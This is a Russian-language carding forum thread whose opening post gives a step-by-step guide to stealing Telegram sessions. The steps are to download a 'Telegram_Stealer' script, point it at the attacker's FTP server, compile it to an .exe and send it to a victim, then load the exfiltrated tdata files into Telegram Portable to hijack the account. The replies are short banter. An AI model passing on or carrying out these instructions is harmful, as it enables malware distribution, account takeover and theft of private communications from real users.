Привет, гость!

Добро пожаловать на CVVBOARD - крупнейший теневой кардинг форум. У нас Вы сможете найти огромное множество статей по теме кардинга и заработка в интернете. Актуальная информация, новости даркнета, сервисы от проверенных продавцов, эксклюзивные, только рабочие схемы заработка, ежедневные раздачи - все это Вы найдете на нашем форуме! Не пренебрегайте услугами Гарант-Сервиса это убережет Вас от мошенников. Обратите внимание, звание модератора не является гарантом в сделках!

Пиздим телеграммы))

Download_Link

Участник клуба
Регистрация
7 Июл 2020
Сообщения
404
Реакции
58
Депозит
200$
Без долгого вступления:

1. Качаем https://github.com/teleport21/Telegram_Stealer/archive/master.zip
2. Устанавливаем Python (3.8.2) на свой компьютер

3. Устанавливаем редактор кода - Visual Studio Code или Sublime Text 3

4. Регистрируемся на каком-нибудь FTP-сервере

5. Открываем файл с помощью редактора кода и записываем вашу информацию в коде (хост, логин, пароль от фтп, на который будет приходить вся инфа)

6. Компилируем код Python в exe-файле. Я использовал auto-py-to-exe

7. Отправляем готовый .exe своей жертве. Когда онa откроет ваш файл, вы получите 2 файла .zip на свой FTP-сервер

8. Качаем Telegram Portable и открываем его. В Telegram появится папка «tdata» - откройте ее. У вас будет папка "D877F783D5D3EF8C" - откройте ее и замените map0 или map1 (вы должны использовать свой файл с сервера tdata.zip)

9. Открываем снова «tdata» - находим файл «D877F783D5D3EF8C», удаляем их. Перенесим аналогичный файл с вашего tdata1.zip или tdata2.zip

10. Запускаем Telegram Portable - у нас на руках будет украденная сессия.

Мои поздравления! ✌️
 

jmot77

КИДАЛА
Регистрация
18 Мар 2016
Сообщения
0
Реакции
0
А с логов не проще?
 

Janna_Vasilyevna

Опытный user
Регистрация
12 Июл 2020
Сообщения
691
Реакции
6
У меня дома тоже воруют письма с почтовых ящиков
 

NyaMan

Участник клуба
Регистрация
24 Май 2018
Сообщения
410
Реакции
1
А че там шарить?
 

питбуль

Опытный user
Регистрация
14 Авг 2018
Сообщения
190
Реакции
1
а так любой можно да спиздить и мой тоже?
 
Сверху Снизу